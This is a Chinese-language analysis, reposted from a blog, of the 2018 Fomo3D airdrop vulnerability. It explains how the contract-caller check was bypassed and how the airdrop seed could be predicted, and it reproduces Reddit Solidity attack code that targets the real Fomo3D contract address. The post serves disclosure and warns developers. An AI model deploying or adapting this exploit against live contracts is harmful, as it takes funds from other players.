2. 程式人生 > >Fomo3D隨機數生成機制攻擊

Fomo3D隨機數生成機制攻擊

阿新 發佈:2018-12-22

0x00 概述

Fomo3D是一個非常流行的,並且成為幣圈現象級的資金盤遊戲。據筆者所知,目前國內大部分資金盤遊戲都是從Fomo3D的幾個合約基礎上進行的修改。然而,在7月23號,國外著名社群reddit上有人發現了Fomo3D的一處漏洞[1],攻擊者可以利用一定的手段來繞過Fomo3D的防護,從而可以無限制命中空投來進行牟利。

本文主要分析這個攻擊的具體原理,並提醒廣大山寨Fomo3D的專案方,需要小心編寫程式碼,以免上線即歸零。

0x01 Fomo3D的空投機制

一切還得從Fomo3d的一個函式修改器說起:

這裡使用了extcodesize指令來獲取某個以太坊地址的code字串長度。我們都知道以太坊賬戶分為兩種,一種是普通賬戶,一種是合約賬戶,合約賬戶的codesize必然是大於0的,而普通賬戶的則為0,因此通過這種方式來判斷某個地址是否是合約地址。

這裡使用了extcodesize指令來獲取某個以太坊地址的code字串長度。我們都知道以太坊賬戶分為兩種,一種是普通賬戶,一種是合約賬戶,合約賬戶的codesize必然是大於0的,而普通賬戶的則為0,因此通過這種方式來判斷某個地址是否是合約地址。

因此這個isHuman方法就是Fomo3D用來防止某些人用合約來玩這個遊戲的,但是這個判斷靠不靠譜呢?

自然是不靠譜的,我們看看extcodesize原始碼實現:
 

func opExtCodeSize(pc *uint64, evm *EVM, contract *Contract, memory *Memory, stack *Stack) ([]byte, error) {
    a := stack.pop()
​
    addr := common.BigToAddress(a)
    a.SetInt64(int64(evm.StateDB.GetCodeSize(addr)))
    stack.push(a)
​
    return nil, nil
}

這裡獲取長度是從狀態資料庫中獲取的,因此只有合約建立好之後這個判斷才有效。

如果是某個合約的建構函式中執行請求Fomo3D,那麼在建構函式執行過程中,合約還處於部署階段,因此extcodesize執行的結果還是為0,從而就可以繞過這個判斷。

我們再來看看執行空投邏輯的airdrop函式:

可以看到,seed的計算嚴重依賴於以太坊區塊的資料,比如timestamp, difficulty, coinbase, gasLimit, number等欄位,這些都是交易中固定的。唯一的變數就是這裡的msg.sender。但是對於合約賬戶來說,我們可以自己寫個合約來動態建立合約,對seed進行列舉,如果發現符合條件的seed,就可以呼叫fomo3d的airdrop來獲取空投,即百分之百的機率可以獲取到空投。

由於普通賬戶不便於進行列舉,主要過程不好自動化,操作成本太大,所以這才有前面的isHuman來對合約賬戶進行攔截。

正常來講,Fomo3d的空投是按照充值ETH的數額來決定的,數額越大,獲取空投的機會就越多,但是通過上面的攻擊,我們可以以很小的數額來擼空投獲利。

0x02 攻擊合約解析

在參考連結[2]中,reddit上給出了具體的攻擊程式碼(該程式碼不能直接成功執行攻擊)。

入口函式是beginPwn,這裡首先呼叫了checkPwnData來獲取出猜解命中空投條件的攻擊成本、合約地址以及猜解次數。然後如果攻擊成本大於收益,那麼就執行deployContracts執行具體的攻擊。
 

function beginPwn() public onlyAdmin() {
    uint256 _pwnCost;
    uint256 _nContracts;
    address _newSender;
    (_pwnCost, _nContracts,_newSender) = checkPwnData();
        
	//check that the cost of executing the attack will make it worth it
    if(_pwnCost + 0.1 ether < maxAmount) {
       deployContracts(_nContracts,_newSender);
    }
}

我們看一下checkPwnData的邏輯:

function checkPwnData() private returns(uint256,uint256,address) {
    //The address that a contract deployed by this contract will have
    address _newSender = address(keccak256(abi.encodePacked(0xd6, 0x94, address(this), 0x01)));
    uint256 _nContracts = 0;
    uint256 _pwnCost = 0;
    uint256 _seed = 0;
    uint256 _tracker = fomo3d.airDropTracker_();
    bool _canWin = false;
    while(!_canWin) {
        /* 
        * How the seed if calculated in fomo3d.
        * We input a new address each time until we get to a winning seed.
        */
        _seed = uint256(keccak256(abi.encodePacked(
                (block.timestamp) +
                (block.difficulty) +
                ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)) +
                (block.gaslimit) +
                ((uint256(keccak256(abi.encodePacked(_newSender)))) / (now)) +
                (block.number)
        )));
 
        //Tally number of contract deployments that'll result in a win. 
        //We tally the cost of deploying blank contracts.
        if((_seed - ((_seed / 1000) * 1000)) >= _tracker) {
            _newSender = address(keccak256(abi.encodePacked(0xd6, 0x94, _newSender, 0x01)));
            _nContracts++;
            _pwnCost+= blankContractCost;
        } else {
            _canWin = true;
            //Add the cost of deploying a contract that will result in the winning of an airdrop
            _pwnCost += pwnContractCost;
        }
    }
    return (_pwnCost,_nContracts,_newSender);
}

這裡需要了解合約中建立子合約時,子合約的地址生成機制,這些子合約的地址都是根據母合約的地址衍生出來的,公式如下

new_address = address(keccak256(0xd6, 0x94, address, nonce))
new_address2 = address(keccak256(0xd6, 0x94, address, nonce++))

這裡的nonce第一次為0x01,之後每次建立一次子合約就會遞增。

當枚舉出符合條件的seed之後,就返回列舉的次數以及命中的地址和攻擊的花銷,因為部署合約和跨合約呼叫是需要消耗gas的,因此要看攻擊本身是否是划算的。

最後呼叫deployContracts執行攻擊:

function deployContracts(uint256 _nContracts,address _newSender) private {
    for(uint256 _i; _i < _nContracts; _i++) {
        if(_i++ == _nContracts) {
            address(_newSender).call.value(0.1 ether)();
            new AirDropWinner();
        }
    	new BlankContract();
    }
}

這裡的new BlankContract()是用來使得nonce遞增的,然後滿足了遞增次數之後就建立AirDropWinner執行攻擊:


contract AirDropWinner {
    FoMo3DlongInterface private fomo3d = FoMo3DlongInterface(0xA62142888ABa8370742bE823c1782D17A0389Da1);
    constructor() public {
        if(!address(fomo3d).call.value(0.1 ether)()) {
           fomo3d.withdraw();
           selfdestruct(msg.sender);
        }
    }
}

可以看到這裡在建構函式中對fomo3D發起了轉賬操作,從而繞過了isHuman判斷,完成了攻擊。

具體的攻擊交易:

需要注意的是,當空投池大於一定數值的時候才有利可圖。這是因為發起一次交易本身需要gas也很昂貴,如果玩遊戲的人越多,那麼就越有利可圖。

Reference

[1] https://www.reddit.com/r/ethereum/comments/916xni/how_to_pwn_fomo3d_a_beginners_guide

[2] https://www.reddit.com/r/ethdev/comments/91fpqd/fomo_3d_exploit_improved_clearly_explained


原文:https://blog.csdn.net/u011721501/article/details/82684747 

相關推薦

Fomo3D隨機數生成機制攻擊

0x00 概述 Fomo3D是一個非常流行的,並且成為幣圈現象級的資金盤遊戲。據筆者所知,目前國內大部分資金盤遊戲都是從Fomo3D的幾個合約基礎上進行的修改。然而,在7月23號,國外著名社群reddit上有人發現了Fomo3D的一處漏洞[1],攻擊者可以利用一定的手段來繞

Python隨機數生成方法

color randint cde int syn amp 應用 comm 字符串 假設你對在Python生成隨機數與random模塊中最經常使用的幾個函數的關系與不懂之處。以下的文章就是對Python生成隨機數與random模塊中最經常使用的幾個函數的關系,希望你會有

隨機數生成

文件 獲得 tdi %d 函數 1970年1月1日 ... 得到 系統 遇到了這麽個題 1949, 2012, 1946, 1874, 2046, 1994, 1839, 1824, 1999, 1024 Choose one number from the ten num

以太坊源碼之 POA區塊生成機制

有效 mit num 檢測 pow comm 啟動 worker duration 作者:HPB芯鏈團隊 目錄: ● 名詞介紹 ● POA區塊數據結構 ● 新區塊生成周期 ● 新區塊生成優先級 1 名詞介紹 節點:普通的以太坊節點,沒有區塊生成的權利。 礦工:具有區塊生成權

python之隨機數生成方法匯總

random 隨機選擇 amp enc 參數 選擇 不改變 choice shuf python裏面生成隨機數的方法主要集中在numpy模塊的random子模塊中:import numpy as np(1)生成一個隨機浮點數,範圍是0-1:np.random.random(

Java實驗--課上提到的隨機數生成原理簡單實現(不利用庫生成隨機數的簡單算法)

9.png 技術分享 當前 span col 分享 args 簡單 返回 對於隨機數的實驗,根據課程上的教程,有如下的公式: 對應的變量參數的說明: 其中對應的Mouduls變量對應的就是公式中a的值,在公式中的含義就是相當於要循環多少個數才重復的一個值。 Mult

LCG(linear congruential generator): 一種簡單的隨機數生成演算法

目錄 LCG演算法 python 實現 LCG演算法 LCG(linear congruential generator)線性同餘演算法,是一個古老的產生隨機數的演算法。由以下引數組成: 引數 m a c X

隨機數生成並寫入檔案(C實現)

#include <stdlib.h> #include <stdio.h> #include <time.h> //生成隨機數列 int write() { int i,j; FILE *pf = NULL;

c語言隨機數生成

    C標準庫中生成偽隨機數的是rand函式,使用這個函式需要包含標頭檔案stdlib.h,它沒有引數,返回值是一個介於0和RAND_MAX之間的接近均勻分佈的整數。 RAND_MAX是該標頭檔案中定義的一個常量,在不同的平臺上有不同的取值,但可以肯定它是一

Random隨機數生成 u3d學習總結筆記本

Random.InitState((int)System.DateTime.Now.Ticks);//隨機數種子,可以不設定 print(Random.Range(4,10));//不包括10,+f可生成小數      cube.transform.posi

PHP中的幾個隨機數生成函數

win com get 函數 href http 引入 tps 隨機數種子 PHP中的幾個隨機數生成函數 rand() 基於 libc 的隨機種子發生器 mt_rand() 基於 Mersenne Twister 算法返回隨機整數。它可以產生隨機數值的平均速度比 libc

隨機數生成演算法-梅森旋轉(Mersenne Twister/MT)

今天主要是來研究梅森旋轉演算法,它是用來產生偽隨機數的,實際上產生偽隨機數的方法有很多種,比如線性同餘法, 平方取中法等等。但是這些方法產生的隨機數質量往往不是很高,而今天介紹的梅森旋轉演算法可以產生高質量的偽隨 機數,並且效率高效,彌補了傳統偽隨機數生成器的不足。梅森旋轉演算法的最長週期取自一個梅森素數

java隨機數生成工具類RandomStringUtils使用教程

最近專案中需要用到隨機數,網上搜了一下,發現 RandomStringUtils 這個工具類非常的不錯。而這個類呢?就在我們的最常用的 Apache Commons Lang (org.apache.commons.lang3.RandomStringUtils)包中,這真是

重寫flask-cache的cache_key生成機制

      flask-cache 預設將 (view/%s) % request.path 作為cache_key,但有時並不能滿足實際需要,例如當url中有引數,且引數也要作為cache_key的一部分時,那麼不同的引數就會

Solidity陷阱:以太坊的隨機數生成

Solidity是一種相當新的語言,因為沒有程式碼是完美的,它包含與程式碼相關的問題以及你希望用它完成的任務。本文將指導你使用隨機數作為以太坊智慧合約的輸入時的最佳實踐和陷阱。 Solidity隨機數生成 Solidity無法建立隨機數。實際上,每個建立隨機數的演算法都是偽隨機的——

隨機數生成一個數組,對該陣列檢索

生成一個含100個隨機數的陣列,對其進行檢索,這裡以二分檢索為例。 import java.util.Random; import java.util.Scanner; //引入隨機數的二分檢索 public class RandomErfen { public static voi

OpenCV通過隨機數生成圖片

import cv2 import numpy import os randomByteArray = bytearray(os.urandom(300*400)) flatNumpyArray = numpy.array(randomByteArray)

隨機數生成大集合

肯定首先要用到random模組! import random 1.random.random()  隨機生成0-1之間的浮點數 2.random.uniform(a,b)  隨機生成[a,b)之間的浮點數 3.random.randint(a,b)  隨機生成

由rand7生成rand10以及隨機數生成方法的討論

2. 直接法——利用rand7做計算 由於捨去法每次呼叫rand7的次數未知,所以希望能夠找到一種直接的方法。當然最直接的方法就是用線性同餘這樣的隨機數生成法直接寫一個,但是這就用不上rand7了,與題意不符合。有人希望用rand7的各種組合計算來完成,比如(rand7+rand7+rand7+

TRNG真隨機數生成(true random number generator)

1、概述隨機數 生成一個真正隨機的數並非易事,常用的偽隨機數的生成用的是模餘法,大致是這樣的公式: Rn=(Rn−1∗A+C)modB A,B,C都是常數,Rn為產生的隨機數,Rn−1為上一拍的隨機數,從這個可以看出,這種演算法產生的隨機數並不足夠隨機,與